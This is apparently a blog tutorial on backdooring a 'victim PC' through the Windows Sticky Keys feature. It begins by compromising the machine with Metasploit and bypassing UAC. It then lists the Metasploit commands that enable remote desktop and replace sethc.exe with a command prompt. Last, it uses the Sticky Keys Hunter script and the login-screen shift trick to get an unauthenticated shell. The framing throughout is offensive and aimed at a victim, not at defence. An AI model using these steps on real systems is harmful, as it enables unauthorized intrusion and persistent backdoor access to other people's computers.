Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter

This bash script tests for sticky keys and utilman backdoors. The script will connect to an RDP server; send both the sticky keys and utilman triggers and screenshot the result.

How does it work?

  • Connects to RDP using rdesktop
  • Sends shift 5 times using xdotool to trigger sethc.exe backdoors
  • Sends Windows+u using xdotool to trigger utilman.exe backdoors
  • Takes screenshot
  • Kills RDP connection

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Bypass the UAC Protection of Victim PC (Tutorial How to Bypass UAC Protection)

After getting the session enable the remote desktop option of remote pc using following exploit

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

In Next step replace the sticke key with command prompt using following exploit

msf > use post/windows/manage/stickey_keys

msf post(stickey_keys) > set session 2

msf post(stickey_keys) > exploit

Now clone Sticky Keys Hunter repository from github, to do so type:

git clone //github.com/ztgrace/sticky_keys_hunter.git

For scan a single host: ./stickyKeysHunter.sh 192.168.0.120

Now a pop will open like below

Now press shift key 5 times at the login screen now a command prompt will open up

Now you can do anything in victim pc through command prompt. I am using net user command to see the list of active account

Leave a Reply

Your email address will not be published. Required fields are marked *